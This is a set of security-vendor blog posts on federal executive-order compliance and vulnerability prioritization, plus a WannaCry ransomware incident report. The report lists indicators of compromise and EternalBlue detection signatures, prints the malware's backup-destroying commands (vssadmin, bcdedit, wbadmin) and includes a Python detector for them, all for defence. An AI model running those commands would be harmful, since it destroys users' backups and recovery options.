While this might seem like a great way to prioritize which vulnerabilities to resolve, the simple fact is that all vulnerabilities cannot be resolved quickly. A large enterprise can fall weeks or months behind mitigation schedules because of the volume of vulnerabilities produced every cycle. If an application requires EoL’d software to run, mitigation can be very difficult and may involve recoding the application. This can leave some low-category CVEs unresolved for a very long time. And this is what the EO is pointing out, and rightly so. Why?

Here are some examples of where this type of rating system falls short. First, a low rating from NIST on a publicly facing application inside the DMZ that accesses sensitive information or information with PII on the back end. Even worse, maybe that software was EoL’d recently and there is no patch or remediation. Coders were already working on changing the code to support a newer software, but it’s three or four months away. While this may show up on a list of vulnerabilities as not-a-priority, you can easily see where this should be a high priority.

Second, a critical rating from NIST is given on a printer system that sits deep in the bowels of an enterprise network behind three different layers of firewalls. Also, the printer system is not on network connected to anything with sensitive data. This would show up in bright red in a list of vulnerabilities, but should be prioritized lower than the first example.

Finally, an HVAC system that should not, but does, sit on the same subnet as an organization’s database containing PII such as SSNs or credit card information. The HVAC system requires EoL’d software to run the ICS, and that software has just received a Medium NIST-rated CVE. On a simple list, this would show up as not important and difficult to resolve. However, a quick look at the network topology would show that the organization should firewall off this system from the network it is accidentally on. (See below how to get a “quick look”.) On top of that, attackers have been actively using this vulnerability to exploit these systems.

GuidePoint Security has three recommended technologies that could significantly help better prioritize and mitigate these vulnerabilities.

Network Vulnerability Management Platform

In the first two blogs, here and here, NVM platforms were mentioned. The basic recap is that vulnerabilities are mapped to the network and a risk score is associated with each. Here’s your “quick look” referred to above. This is exactly what is needed when comparing the three cases for prioritization. There are several other valuable things NVMs add to a security infrastructure, but this value relates to the EO specifically around which vulnerabilities to mitigate. Several customers have been able to document why a specific vulnerability might not be as critical to address as a basic NIST score might indicate, and to prioritize much higher-risk vulnerabilities in context.

RedSeal Image

Vulnerability Threat Intelligence Mapping

This solution consumes an organization’s list of vulnerabilities and maps them to threat actor activity observed in threat intelligence. While this would not predict a new vulnerability’s sudden use in the wild, it could help a security organization realize that a low- or medium-rated NIST vulnerability that is visible from the outside is a high risk because it is being actively used by criminal or nation-state actors.

Kenna Security Image

Application Delivery Controller/Web Application Firewall

While this might seem a default and not innovative, GuidePoint still finds organizations that do not have high-quality Application Delivery Controllers (ADC), or that have them and use them only as load balancers. These proxies offer significant value when trying to mitigate vulnerabilities in applications that rely on old software or that cannot be easily fixed. By removing direct access to the application and forcing all traffic through the ADC, a vulnerability can be made unreachable from the network even while it remains unresolved downstream inside the actual application. This allows downtime planning or coding changes to be made on a reasonable schedule.

The best example of this was when applications were required to move from SSL to TLS (now at version 1.2). Many custom applications simply didn’t have the ability to make the change without code rewrites. By using a quality ADC/WAF, the connection from application to user could be converted to TLS, while the downstream application was scheduled for coding updates to make it possible to move to TLS natively. Restricting data traffic to just between the application and the ADC mitigates the problem.

F5 Image

There are other solutions that can help as well; however, these three should be top considerations. If an organization doesn’t have them in its tool chest now, it should consider moving quickly to purchase, install and use them in order to meet the EO’s requirement to mitigate known vulnerabilities. For more about the above solutions and other choices, contact GuidePoint Federal at Federal@guidepointsecurity.com.

About the author:

Jean-Paul Bergeaux, Federal CTO, GuidePoint Security

With more than 18 years of experience in the Federal technology industry, Jean-Paul Bergeaux is currently the Federal CTO for GuidePoint Security. JP’s career has been marked by success in technical leadership roles with ADIC (now Quantum), NetApp, Commvault and SwishData. Jean-Paul focuses on identifying customers’ challenges and architecting innovative solutions to solve their complex problems. He is also a thought leader on topics that are top of mind for Federal IT Managers like Cyber Security, VDI, Big Data, and Backup & Recovery.


Quick-hit product categories that can boost executive agencies’ EO-mandated NIST risk scores

In the first of four blogs on GuidePoint Security’s guidance for how Federal Agencies can best respond to the President’s EO, we focused on the steps to take in preparing the report due to DHS/OMB in 90 days. This second blog is about how to boost an agency’s compliance and risk scoring for that report within the short 90-day window.

Here are five product types (not OEMs) that should be quick hits for government agencies to deploy before issuing their NIST report to DHS/OMB in 90 days. By quick hit, we mean that these solutions are the quickest to deploy and to show value in security posture. As would be expected, the first two are SaaS based, making them the easiest to deploy and get up and running.

  • IDaaS for SSO/MFA deployment (SaaS based)
  • CASB (SaaS based)
  • Threat Intelligence Management platform
  • Privileged Access Management
  • Vulnerability prioritization

These solutions are not about highest value in security posture, although some of them do significantly move an agency’s security posture. The point is meeting the compliance standards of NIST for the 90 day reporting deadline.

IDaaS (Protect, Detect)

IDaaS adds identity access functionality, most importantly Single Sign-On (SSO) and Multi-Factor Authentication (MFA). Adding a cloud-based solution to an organization’s infrastructure is usually a quick deployment, saving time and providing value.

SSO eliminates authentication outliers, which come in the form of cloud (SaaS and IaaS/PaaS) and legacy applications. Typically, cloud solutions like ServiceNow, AWS, and SalesForce are not well integrated with on-prem IdAM core functionality. This leaves gaps in password management, and in logging and alerting on the activity users have with these sanctioned applications.

Okta “Multi-Factor setup for IDaaS SSO”

In addition, most large enterprises like government agencies have legacy applications that require a second username and password after the core IdAM login, such as Active Directory (AD). Like cloud applications, these legacy applications lack integration with the core IdAM, leaving gaps in password management and logging as well. By bringing these legacy applications into an SSO implementation for password management and logging, better security for these applications can be maintained.

Finally, and probably most importantly, IDaaS allows for easy-to-use MFA, typically smartphone codes or push notifications. We have seen these types of solutions implemented in days, rather than the weeks or months legacy token-based MFA solutions take. This type of MFA also offers a much lower Total Cost of Ownership (TCO), being cheaper both to buy and to maintain.

CASB (Protect, Detect, Respond)

Cloud Access Security Brokers (CASB) are hot, and for good reason. The main three functions that a CASB can add to an agency’s security infrastructure are centralized sanctioned-cloud policy management, significantly improved sanctioned-cloud logging, and unsanctioned-cloud visibility. There are many more functions that a CASB can add; however, these three are easy to deploy, get working, and show value.

Again, a significant feature here is SaaS deployment, which greatly improves deployment speed and simplicity. In a matter of days or weeks, a government agency can show cloud policy lockdown, cloud activity logging to its SIEM, and a significant improvement in locking down unsanctioned or shadow IT activity.

SkyHigh Networks “Cloud security posture status main console”

The only way for an organization to understand the impact a CASB has on sanctioned cloud usage such as O365, ServiceNow, SalesForce, AWS, etc. is for them to see it themselves.

Threat Intelligence Management Platform (Detect, Respond)

A threat intelligence management platform correlates, deduplicates and distributes threat intelligence throughout the security infrastructure. A quality threat platform will integrate with core products like Splunk, LogRhythm, and QRadar as well as nearly every type of security product across network, endpoint, analytics and more.

Anomali “Threat Intelligence Management Platform example”

With built-in integration for already-purchased threat intelligence licenses and ingestion from SIEMs, these products allow each feed to be enriched by the others’ information and ensure that the entire security infrastructure stays informed of the latest threat and attacker information. This can significantly boost an agency’s scoring in the Detect category of the NIST framework and is not very complicated to deploy and get working.

Privileged Access Management (Protect, Detect, Respond)

In the Civilian space, CDM’s award for Privileged Access Management has brought the solution front and center, but rollout is still not moving fast enough to cover enough agencies. Deploying this solution immediately improves an agency’s security posture, because administrator access to data is the common theme in most incidents.

These solutions take away direct access to administrator credentials and make privileged users “check out” administrative credentials for daily use. This prevents a user account compromise from directly giving an adversary administrative access, and also adds a logging mechanism for administrative activities. This can significantly prevent, delay or provide an early warning of an attack in progress.

Vulnerability Prioritization and Risk Scoring (Identify, Protect, Detect, Respond)

In the first blog about the President’s EO, it was mentioned that a Network Vulnerability Management tool could help map vulnerabilities to the network and help risk-score the environment. This helps prioritize highly dangerous vulnerabilities and, in some cases, reduce the urgency of patching others.

In addition, there are other vulnerability risk scoring platforms that add context about which exploits are actively in use. Again, the goal is to prioritize the most important vulnerabilities for urgent patching and mitigation. By combining threat intelligence on current attacker activity, this solution can be the difference between patching an actively exploited SMBv1 vulnerability first and one that is not currently in active use second.

These five solutions may not be the best next step from a pure security architecture standpoint, depending on the agency’s maturity and current architecture, but any one of them could be deployed inside the 90-day window if a purchase can be fast-tracked and the agency can get the product in the door quickly. GuidePoint Security has the ability to augment the services needed to get any one of these solutions up and running. For more information about how to execute any of these solutions as soon as possible, contact GuidePoint Security at federal@guidepointsecurity.com.

About the author:

Jean-Paul Bergeaux, Federal CTO, GuidePoint Security


President Trump’s Executive Order. What agencies need to do to respond.

Since President Trump released his EO a few days ago, we at GuidePoint Security Federal have been carefully crafting strategies for our customers to respond to the requirements detailed in it. This is the first of four blogs outlining some of our guidance. This first blog covers the important take-aways in the EO and how best to produce an acceptable risk management report in the tight 90-day window. The second blog will offer some “quick hit” products that are the easiest to deploy and close gaps in the NIST framework, boosting agency scores. The third focuses specifically on what the EO calls the “highest risk” to agencies: known but unmitigated vulnerabilities. The fourth blog will address how the EO defines Cybersecurity Risk Management by mapping specific products, not vendors, to each of its four areas.

The take-aways below are specific to Section 1 and do not cover the entire EO, but they outline some important points to note. They do not cover Sections 2 and 3, which are about how agencies in the Executive Branch should support non-government entities, nor Section 4, which offers some definitions for clarity. It is important to note that this EO covers all Civilian, DoD and IC agencies not part of the Legislative or Judicial Branch of government. Quick Hits:

  • Section 1 b (i) defines Cybersecurity Risk Management as:
    • Protecting IT from unauthorized access
    • Maintaining awareness of threats
    • Detecting anomalies and incidents
    • Mitigating the impact of incidents through response and recovery
      (NOTE: These points closely map to the NIST categories below in Figure 1)
  • Section 1 b (iv) Specifically calls out known but unmitigated vulnerabilities as the highest risk to agencies.
  • Section 1 b (v) Exhorts agency leadership to personally head the integration of typically siloed teams such as IT, security, budgeting, acquisition, policy, and HR for better risk management.
  • Section 1 c (i) Agency heads should implement risk management measures to prevent harm from unauthorized:
    • Access
    • Use
    • Disclosure
    • Disruption (of government services)
    • Modification (of government owned data)
    • Destruction (of government data or IT infrastructure)
  • Section 1 c (ii) Establishes the NIST Cybersecurity Framework as the standard measurement to manage cybersecurity risk, overriding any DoD or IC standards. It mandates a risk management report by each agency within 90 days.
  • Section 1 c (iii) Establishes DHS and OMB as the joint assessors of each agency’s report, determining whether it is sufficient to manage the cybersecurity risk of that agency. For the first time, DoD and IC agencies are commanded to report to both DHS and OMB as authorities for cybersecurity.
  • Section 1 c (iv) Mandates that OMB and DHS have 60 days from time of receiving each agency’s report to send the President a determination from Section 1 c (iii) and a plan of action going forward for each agency.
  • Section 1 c (vi) Mandates that agencies (DoD, IC, and Civilian) move to “shared IT services” which appears to be public or private cloud and requires a report on that effort within 90 days.

Figure 1. NIST Functions Graphic

Now we will focus on Section 1 c (ii) of the EO, where the President defines the NIST Cybersecurity Framework as the official standard against which Executive Branch agencies should manage their risk. It then mandates that each agency under the President’s authority (which includes Civilian, DoD and IC, but not Legislative or Judicial organizations) create a report within 90 days of the EO being issued.

This means that each agency must be able to show that it can:

  • Identify systems, assets, data, and capabilities.
  • Protect delivery of critical services.
  • Detect threats and attacks defined as cybersecurity events.
  • Respond to threats and attacks detected as cybersecurity events.
  • Recover from attacks and compromises by maintaining plans for resilience and plans for restoring services.

Anyone who is familiar with government cybersecurity will recognize Figure 1 as the NIST “Functions” graphic from the official NIST.gov Cybersecurity Framework document. This is not new information. However, the question is, “How do I measure myself against this NIST Framework for my report to DHS and OMB?” Some Federal customers we work with are well down the path to delivering on the EO’s reporting mandate. Others, however, have previously chosen to devote all resources to securing their infrastructure rather than tracking, for reporting purposes, how they map to the NIST framework.

Following the NIST categories, we recommend agencies start with discovery and profiling to Identify the assets, software and vulnerabilities that need to be addressed. Protecting, the next category, requires mapping that information onto the current network infrastructure and resolving any high-risk gaps. Detecting threats, Responding to attacks, and Recovering from events involve both technical products and a codified policy inside the agency.

Check out our next blog, which will detail some quick-hit products to improve an agency’s security posture for the last three NIST categories (Detect, Respond, Recover). The first two, Identify and Protect, can be done quickly, if not already in place, to show compliance with the NIST framework before the report needs to be completed. This requires only a comprehensive endpoint profiler and a Network Vulnerability Management solution that consumes asset, vulnerability, and network configuration information and maps them together into something like Figure 2.

Figure 2. (RedSeal Graphic)

Finally, agencies need a Governance, Risk and Compliance (GRC) product that can consume all technical and policy information to produce a comprehensive NIST compliance and risk assessment report. If an agency is already using a GRC product, it simply needs to configure and start running the NIST modules that produce the required reporting. However, many agencies do not run GRC products yet. GRC products in general have developed a reputation for being difficult to stand up and get operating well for something like this; however, there are GRC solutions that are not difficult and cumbersome. GuidePoint has been working with specific GRC products designed to stand up, integrate, and provide reporting on modules like NIST compliance status quickly, meeting the needs of responding to the EO.

Contact us at federal@guidepointsecurity.com for assistance in helping your agency respond with the best possible report to DHS/OMB today!

About the author:

Jean-Paul Bergeaux, Federal CTO, GuidePoint Security


Lisa Morehouse of GuidePoint Named a Power 30 Solution Provider in CRN’s 2017 Women of the Channel

GuidePoint Security LLC, announced today that CRN®, a brand of The Channel Company, has named Lisa Morehouse, Vice President of Operations, to its list of 2017 Power 30 Solution Providers, an elite subset of its prestigious annual Women of the Channel list.

CRN’s editorial team selects Women of the Channel honorees based on their professional accomplishments, demonstrated expertise and ongoing dedication to the channel. The Power 30 Solution Providers belong to an exclusive group drawn from this larger list: women leaders in solution provider organizations whose vision and influence are key drivers of their companies’ success and help move the entire IT channel forward.

Lisa Morehouse, who joined GuidePoint in 2012, has worked in the channel for over a decade. At GuidePoint, she developed and executed the vast majority of the daily operations, including accounting and finance, contracts and legal, as well as human resources and sales operations. Morehouse has been instrumental in increasing the organization’s channel business by building and expanding distribution relationships, and educating internal and external stakeholders about the value of the channel. Her knowledge, experience and expertise all played a vital role in helping GuidePoint become one of the top cybersecurity companies in the country.

“These extraordinary executives support every aspect of the channel ecosystem, from technical innovation to marketing to business development, working tirelessly to keep the channel moving into the future,” said Robert Faletra, CEO of The Channel Company. “They are developing fresh go-to-market strategies, strengthening the channel’s network of partnerships and building creative new IT solutions, among many other contributions. We congratulate all the 2017 Women of the Channel on their stellar accomplishments and look forward to their future success.”

“Lisa has been an essential member of the company since nearly the beginning,” stated GuidePoint Security Founder and Managing Partner Michael Volk. “Her many contributions, hard work, and continuous efforts are just some of the reasons GuidePoint has been able to accomplish so much in such a very short period of time. We are all very proud of Lisa and thrilled she has been recognized as one of the members of such a distinguished group of women in the channel,” Volk concluded.

To read more about Lisa Morehouse and her contributions, visit http://wotc.crn.com/wotc2017-details.htm?w=333.

The 2017 Women of the Channel and Power 30 Solution Provider lists will be featured in the June issue of CRN Magazine and online at www.CRN.com/wotc.

About GuidePoint Security
GuidePoint Security LLC provides innovative and valuable cybersecurity solutions and expertise that enable organizations to successfully achieve their missions. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Herndon, Virginia, GuidePoint Security is a small business, with its classification recorded in the System for Award Management (SAM). Learn more at: http://www.guidepointsecurity.com.

About the Channel Company
The Channel Company enables breakthrough IT channel performance with our dominant media, engaging events, expert consulting and education, and innovative marketing services and platforms. As the channel catalyst, we connect and empower technology suppliers, solution providers and end users. Backed by more than 30 years of unequaled channel experience, we draw from our deep knowledge to envision innovative new solutions for ever-evolving challenges in the technology marketplace. www.thechannelco.com. Copyright ©2017. The Channel Company, LLC. CRN is a registered trademark of The Channel Company, LLC. All rights reserved.

vSOC SPOT Report – WCrypt (WanaCrypt0r 2.0) – Ransomware Attack

Latest Updates

2017-05-14 10:08 EDT

Researchers are reporting that a new variant of the WannaCrypt malware has been observed in the wild notably missing the kill switch check for the www.Iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com domain that @MalwareTechLab registered to stop the first variant from propagating as fast. It has been speculated that the kill switch was actually a poorly implemented check to see if the malware was running in a sandbox. Even variants with the kill switch can continue to propagate and infect vulnerable networks through phishing emails or other lateral movement capabilities.

It is imperative that all Windows systems be patched. Microsoft released an out-of-band patch for deprecated operating systems to include Windows XP and Server 2003 Saturday to help thwart this campaign. vSOC will remain diligent in monitoring all client environments for signs of compromise or infection.

GuidePoint recommends disabling SMBv1 using a GPO or PowerShell script:

Via GPO

To enable or disable SMBv1 on the SMB server, configure the following registry key (a reboot is required):

Registry subkey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
Registry entry: SMB1
REG_DWORD: 0 = Disabled
REG_DWORD: 1 = Enabled
Default: 1 = Enabled

To enable or disable SMBv2 on the SMB server, configure the following registry key:

Registry subkey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
Registry entry: SMB2
REG_DWORD: 0 = Disabled
REG_DWORD: 1 = Enabled
Default: 1 = Enabled

Via PowerShell

To disable SMBv1 on the SMB server, run the following cmdlet:

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name SMB1 -Type DWORD -Value 0 -Force

To enable SMBv2 and SMBv3 on the SMB server, run the following cmdlet:

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name SMB2 -Type DWORD -Value 1 -Force

2017-05-12 22:28 EDT

A UK malware researcher whose Twitter handle is @MalwareTechLab “accidentally” stopped one widespread variant of the ransomware from propagating further by registering a domain discovered while analyzing the code. The domain, Iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, is a kill switch: the code sends a GET request for it. If the domain is not found, the code continues and infects the host. If the domain is found, the code exits and the host is not infected. As long as the domain does not get revoked or taken down, this particular variant will cease infecting new machines. New variants without this kill switch feature are likely to spring up in the coming days and weeks, so due diligence is highly recommended along with patching all vulnerable systems and disabling SMBv1.

Based on this latest information, GuidePoint recommends our original mitigation steps:

  • All systems be updated to the latest patch available from Microsoft. The patch specific to the exploit kit is labeled KB4012598 or MS17-010 and should be evaluated for immediate deployment if it has not already been applied. This prevents the SMB traffic from exploiting the vulnerability and eliminates the initial infection vector.
  • Application whitelisting be applied to prevent any applications from running which are not from a specified location or signed by a whitelisted vendor.
  • You create and maintain offline backups of critical data, which will reduce the amount of damage a crypto-ransomware attack is capable of inflicting.
  • You ensure your antivirus definitions are up to date. Most major antivirus vendors have been provided samples of this malware and have developed detections and definitions. Currently, approximately 31 out of 60 A/V vendors tested can recognize and stop this infection. Major vendors not yet on that list include Symantec and Sophos.

Latest Indicators of Compromise

2017-05-12 22:36 EDT

File Names

  • mssecsvc.exe
  • @wanadecryptor@.exe
  • taskdl.exe
  • taskse.exe
  • tasksche.exe
  • tor.exe
  • @Please_Read_me@.txt

File Extensions

  • .wcry
  • .wncry
  • .wncryt
  • .wncy

Windows Service Name

  • mssecsvc2.0
  • Microsoft Security Center (2.0) Service

File Strings

  • Wanna Decryptor 1.0
  • Wana DecryptOr
  • Wana Decrypt0r
  • WANNACRY
  • WanaCryptOr
  • WanaCrypt0r
  • WANACRY!
  • WNcry@2o17

File Hash Values


Command and Control IPs:


Sender IPs:


Tor Onion URLs:

  • 57g7spgrzlojinas.onion
  • 76jdd2ir2embyv47.onion
  • cwwnhwhlz52maqm7.onion
  • gx7ekbenv2riucmf.onion
  • sqjolphimrr7jqw6.onion
  • Xxlvbrloxvriy2c5.onion

Mutex:

  • ShimCacheMutex
  • Global\MsWinZonesCacheCounterMutexA0
  • MsWinZonesCacheCounterMutexA

Domains:

  • R12.sn-h0j7sn7s.gvt1.com
  • Iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Email Sender:

  • alertatnb@serviciobancomer.com

Kill Switch Domain:

  • www.Iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Snort Signatures:

alert tcp $HOME_NET 445 -> any any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response"; flow:from_server,established; content:"|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|"; depth:16; fast_pattern; content:"|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|"; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:2;)

alert smb any any -> $HOME_NET any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray"; flow:to_server,established; content:"|ff|SMB|33 00 00 00 00 18 07 c0 00 00 00 00 00 00 00 00 00 00 00 00 00|"; offset:4; depth:25; content:"|08 ff fe 00 08 41 00 09 00 00 00 10|"; within:12; fast_pattern; content:"|00 00 00 00 00 00 00 10|"; within:8; content:"|00 00 00 10|"; distance:4; within:4; pcre:"/^[a-zA-Z0-9+/]{1000,}/R"; threshold: type threshold, track by_src, count 12, seconds 1; classtype:trojan-activity; sid:2024217; rev:1;)

alert smb any any -> $HOME_NET any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Request (set)"; flow:to_server,established; content:"|00 00 00 31 ff|SMB|2b 00 00 00 00 18 07 c0|"; depth:16; fast_pattern; content:"|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|"; distance:0; flowbits:set,ETPRO.ETERNALBLUE; flowbits:noalert; classtype:trojan-activity; sid:2024220; rev:1;)

alert smb $HOME_NET any -> any any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response"; flow:from_server,established; content:"|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|"; depth:16; fast_pattern; content:"|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|"; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:1;)
http://docs.emergingthreats.net/bin/view/Main/2024218

The ransomware encrypts files with the following extensions:

.der, .pfx, .key, .crt, .csr, .p12, .pem, .odt, .ott, .sxw, .stw, .uot, .3ds, .max, .3dm, .ods, .ots, .sxc, .stc, .dif, .slk, .wb2, .odp, .otp, .sxd, .std, .uop, .odg, .otg, .sxm, .mml, .lay, .lay6, .asc, .sqlite3, .sqlitedb, .sql, .accdb, .mdb, .dbf, .odb, .frm, .myd, .myi, .ibd, .mdf, .ldf, .sln, .suo, .cpp, .pas, .asm, .cmd, .bat, .ps1, .vbs, .dip, .dch, .sch, .brd, .jsp, .php, .asp, .java, .jar, .class, .mp3, .wav, .swf, .fla, .wmv, .mpg, .vob, .mpeg, .asf, .avi, .mov, .mp4, .3gp, .mkv, .3g2, .flv, .wma, .mid, .m3u, .m4u, .djvu, .svg, .psd, .nef, .tiff, .tif, .cgm, .raw, .gif, .png, .bmp, .jpg, .jpeg, .vcd, .iso, .backup, .zip, .rar, .tgz, .tar, .bak, .tbk, .bz2, .PAQ, .ARC, .aes, .gpg, .vmx, .vmdk, .vdi, .sldm, .sldx, .sti, .sxi, .602, .hwp, .snt, .onetoc2, .dwg, .pdf, .wk1, .wks, .123, .rtf, .csv, .txt, .vsdx, .vsd, .edb, .eml, .msg, .ost, .pst, .potm, .potx, .ppam, .ppsx, .ppsm, .pps, .pot, .pptm, .pptx, .ppt, .xltm, .xltx, .xlc, .xlm, .xlt, .xlw, .xlsb, .xlsm, .xlsx, .xls, .dotx, .dotm, .dot, .docm, .docb, .docx, .doc

Once started it immediately spawns several processes to change file permissions and communicate with tor hidden c2 servers:

attrib +h .
icacls . /grant Everyone:F /T /C /Q
C:\Users\xxx\AppData\Local\Temp\taskdl.exe
@WanaDecryptor@.exe fi
300921484251324.bat
C:\Users\xxx\AppData\Local\Temp\taskdl.exe
C:\Users\xxx\AppData\Local\Temp\taskdl.exe
The malware creates the mutex "Global\MsWinZonesCacheCounterMutexA" and runs the command:
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
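The command lines above are a useful host-side detection source. As an added example that is not part of the original report, the following Python runs indicator patterns derived from those commands over constructed process-creation events (host, command line) and flags a host only when several distinct indicators co-occur, so that a lone admin running one bcdedit command is not reported.

```python
import re

# Indicator patterns taken from the command lines listed above (case-insensitive).
INDICATORS = {
    "vss_delete":      re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    "wmic_shadow":     re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    "bcdedit_norecov": re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no", re.I),
    "wbadmin_catalog": re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I),
    "icacls_everyone": re.compile(r"icacls\s+\.\s+/grant\s+Everyone:F", re.I),
    "attrib_hide_cwd": re.compile(r"attrib\s+\+h\s+\.", re.I),
}


def classify(command_line):
    """Return the set of indicator names matched by a single command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(command_line)}


def find_ransomware_hosts(events, threshold=2):
    """events: iterable of (host, command_line).

    Indicators are accumulated per host; a host is reported only when it shows
    at least `threshold` distinct indicators, which suppresses single benign hits.
    """
    hits = {}
    for host, cmd in events:
        hits.setdefault(host, set()).update(classify(cmd))
    return {host: sorted(names) for host, names in hits.items() if len(names) >= threshold}


# Constructed sample process-creation events (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("ws01", r"C:\Windows\System32\cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete"
             r" & bcdedit /set {default} bootstatuspolicy ignoreallfailures"
             r" & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet"),
    ("ws01", "attrib +h ."),
    ("ws01", "icacls . /grant Everyone:F /T /C /Q"),
    ("ws02", "vssadmin list shadows"),                                   # benign enumeration
    ("ws03", r"C:\Windows\System32\bcdedit.exe /set {default} recoveryenabled no"),  # one indicator only
]

if __name__ == "__main__":
    for host, names in find_ransomware_hosts(SAMPLE_EVENTS).items():
        print(host, names)
```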

Files:

  • [Installed_Folder]\00000000.eky
  • [Installed_Folder]\00000000.pky
  • [Installed_Folder]\00000000.res
  • [Installed_Folder]\@WanaDecryptor@.exe
  • [Installed_Folder]\@WanaDecryptor@.exe.lnk
  • [Installed_Folder]\b.wnry
  • [Installed_Folder]\c.wnry
  • [Installed_Folder]\f.wnry
  • [Installed_Folder]\msg\
  • [Installed_Folder]\msg\m_bulgarian.wnry
  • [Installed_Folder]\msg\m_chinese (simplified).wnry
  • [Installed_Folder]\msg\m_chinese (traditional).wnry
  • [Installed_Folder]\msg\m_croatian.wnry
  • [Installed_Folder]\msg\m_czech.wnry
  • [Installed_Folder]\msg\m_danish.wnry
  • [Installed_Folder]\msg\m_dutch.wnry
  • [Installed_Folder]\msg\m_english.wnry
  • [Installed_Folder]\msg\m_filipino.wnry
  • [Installed_Folder]\msg\m_finnish.wnry
  • [Installed_Folder]\msg\m_french.wnry
  • [Installed_Folder]\msg\m_german.wnry
  • [Installed_Folder]\msg\m_greek.wnry
  • [Installed_Folder]\msg\m_indonesian.wnry
  • [Installed_Folder]\msg\m_italian.wnry
  • [Installed_Folder]\msg\m_japanese.wnry
  • [Installed_Folder]\msg\m_korean.wnry
  • [Installed_Folder]\msg\m_latvian.wnry
  • [Installed_Folder]\msg\m_norwegian.wnry
  • [Installed_Folder]\msg\m_polish.wnry
  • [Installed_Folder]\msg\m_portuguese.wnry
  • [Installed_Folder]\msg\m_romanian.wnry
  • [Installed_Folder]\msg\m_russian.wnry
  • [Installed_Folder]\msg\m_slovak.wnry
  • [Installed_Folder]\msg\m_spanish.wnry
  • [Installed_Folder]\msg\m_swedish.wnry
  • [Installed_Folder]\msg\m_turkish.wnry
  • [Installed_Folder]\msg\m_vietnamese.wnry
  • [Installed_Folder]\r.wnry
  • [Installed_Folder]\s.wnry
  • [Installed_Folder]\t.wnry
  • [Installed_Folder]\TaskData\
  • [Installed_Folder]\TaskData\Data\
  • [Installed_Folder]\TaskData\Data\Tor\
  • [Installed_Folder]\TaskData\Tor\
  • [Installed_Folder]\TaskData\Tor\libeay32.dll
  • [Installed_Folder]\TaskData\Tor\libevent-2-0-5.dll
  • [Installed_Folder]\TaskData\Tor\libevent_core-2-0-5.dll
  • [Installed_Folder]\TaskData\Tor\libevent_extra-2-0-5.dll
  • [Installed_Folder]\TaskData\Tor\libgcc_s_sjlj-1.dll
  • [Installed_Folder]\TaskData\Tor\libssp-0.dll
  • [Installed_Folder]\TaskData\Tor\ssleay32.dll
  • [Installed_Folder]\TaskData\Tor\taskhsvc.exe
  • [Installed_Folder]\TaskData\Tor\tor.exe
  • [Installed_Folder]\TaskData\Tor\zlib1.dll
  • [Installed_Folder]\taskdl.exe
  • [Installed_Folder]\taskse.exe
  • [Installed_Folder]\u.wnry
  • [Installed_Folder]\wcry.exe

Registry Entries:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[random] "[Installed_Folder]\tasksche.exe"
  • HKCU\Software\WanaCrypt0r\
  • HKCU\Software\WanaCrypt0r\wd [Installed_Folder]
  • HKCU\Control Panel\Desktop\Wallpaper "[Installed_Folder]\Desktop\@WanaDecryptor@.bmp"

Email Subjects:

  • FILE_<5 numbers>
  • SCAN_<5 numbers>
  • PDF_<4 or 5 numbers>

Email Attachment:

  • nm.pdf

Suricata Signatures (https://github.com/xNymia/Suricata-Signatures/blob/master/EquationGroup.rules):

# EternalBlue Signature matching potential NEW installation of SMB payload
alert tcp $HOME_NET any -> any any (msg:"EXPLOIT Possible Successful ETERNALBLUE Installation SMB MultiplexID = 82 - MS17-010"; flow:from_server,established; content:"|FF|SMB|32 02 00 00 c0|"; offset:4; depth:9; content:"|52 00|"; distance:21; within:23; classtype:trojan-activity; sid:5000072; rev:1;)

# EternalBlue Signature matching return signature for connection to pre-installed SMB payload
alert tcp $HOME_NET any -> any any (msg:"EXPLOIT Successful ETERNALBLUE Connection SMB MultiplexID = 81 - MS17-010"; flow:from_server,established; content:"|FF|SMB|32 02 00 00 c0|"; offset:4; depth:9; content:"|51 00|"; distance:21; within:23; classtype:trojan-activity; sid:5000073; rev:1;)

# Signature to identify what appears to be initial setup trigger for SMBv1 - MultiplexID 64 is another unusual value
alert tcp $HOME_NET any -> any any (msg:"EXPLOIT Possible ETERNALBLUE SMB Exploit Attempt Stage 1/2 - Tree Connect AndX MultiplexID = 64 - MS17-010"; flow:to_server,established; content:"|FF|SMB|75 00 00 00 00|"; offset:4; depth:9; content:"|40 00|"; distance:21; within:23; flowbits: set, SMB.v1.AndX.MID.64; classtype:trojan-activity; sid:5000074; rev:1;)

